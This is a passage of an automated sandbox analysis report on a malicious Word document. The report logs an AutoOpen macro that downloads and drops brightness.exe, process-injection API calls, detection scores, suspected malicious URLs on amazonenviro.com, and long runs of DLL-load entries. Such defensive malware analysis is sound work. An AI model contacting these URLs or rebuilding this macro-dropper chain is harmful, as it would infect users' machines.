Source: brightness.exe, 00000007.00000002.3358633444.000000000065E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://amazonenviro.com/d
Source: brightness.exe, 00000007.00000002.3358633444.00000000006A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://amazonenviro.com:80/245_Aiymwhpjxsg

System Summary

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Source: zYj1wg0cM2.doc	Stream path 'Macros/VBA/ThisDocument' : found possibly 'ADODB.Stream' functions open, savetofile, write
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function AutoOpen, found possibly 'ADODB.Stream' functions open, savetofile, write			Name: AutoOpen

Document contains an embedded VBA with functions possibly related to HTTP operations

Source: zYj1wg0cM2.doc	Stream path 'Macros/VBA/ThisDocument' : found possibly 'XMLHttpRequest' functions response, responsebody, open, send
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function AutoOpen, found possibly 'XMLHttpRequest' functions response, responsebody, open, send			Name: AutoOpen

Office process drops PE file

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Windows\SysWOW64\brightness.exe

Jump to dropped file

Office process queries suspicious COM object (likely to drop second stage)

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	COM Object queried: Server XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{AFBA6B42-5692-48EA-8141-DC517DCF0EF1}			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\InprocServer32			Jump to behavior

Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_0290DFE4 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	7_2_0290DFE4
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_02907CF8 NtWriteVirtualMemory,	7_2_02907CF8
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_02908BA6 GetThreadContext,SetThreadContext,NtResumeThread,	7_2_02908BA6
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_02908BA8 GetThreadContext,SetThreadContext,NtResumeThread,	7_2_02908BA8
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_0290DE24 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	7_2_0290DE24
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_0290DE78 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	7_2_0290DE78
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_0290DF00 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	7_2_0290DF00

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 7_2_0290F0A8 InetIsOffline,CoInitialize,CoUninitialize,Sleep,MoveFileA,MoveFileA,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,

7_2_0290F0A8

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Windows\SysWOW64\brightness.exe

Jump to behavior

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 7_2_028F20C4

7_2_028F20C4

Source: zYj1wg0cM2.doc	OLE, VBA macro line: Sub AutoOpen()
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function AutoOpen			Name: AutoOpen

Source: zYj1wg0cM2.doc

OLE indicator, VBA macros: true

Source: C:\Windows\SysWOW64\brightness.exe	Code function: String function: 028F46A4 appears 244 times
Source: C:\Windows\SysWOW64\brightness.exe	Code function: String function: 02908798 appears 54 times
Source: C:\Windows\SysWOW64\brightness.exe	Code function: String function: 0290881C appears 45 times
Source: C:\Windows\SysWOW64\brightness.exe	Code function: String function: 028F44AC appears 74 times
Source: C:\Windows\SysWOW64\brightness.exe	Code function: String function: 028F480C appears 931 times
Source: C:\Windows\SysWOW64\brightness.exe	Code function: String function: 028F44D0 appears 33 times

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@4/3@1/2

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 7_2_028F7F54 GetDiskFreeSpaceA,

7_2_028F7F54

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 7_2_02906D48 CoCreateInstance,

7_2_02906D48

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\user\Desktop\~$j1wg0cM2.doc

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\{F6605045-D132-47C0-A4CA-F1F9FD65C87A} - OProcSessId.dat

Jump to behavior

Source: zYj1wg0cM2.doc

OLE indicator, Word Document stream: true

Source: zYj1wg0cM2.doc

OLE document summary: title field not present or empty

Source: C:\Windows\SysWOW64\brightness.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\brightness.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: zYj1wg0cM2.doc	Virustotal: Detection: 70%
Source: zYj1wg0cM2.doc	ReversingLabs: Detection: 57%

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\brightness.exe C:\Windows\SysWOW64\brightness.exe
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\brightness.exe C:\Windows\SysWOW64\brightness.exe	Jump to behavior

Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
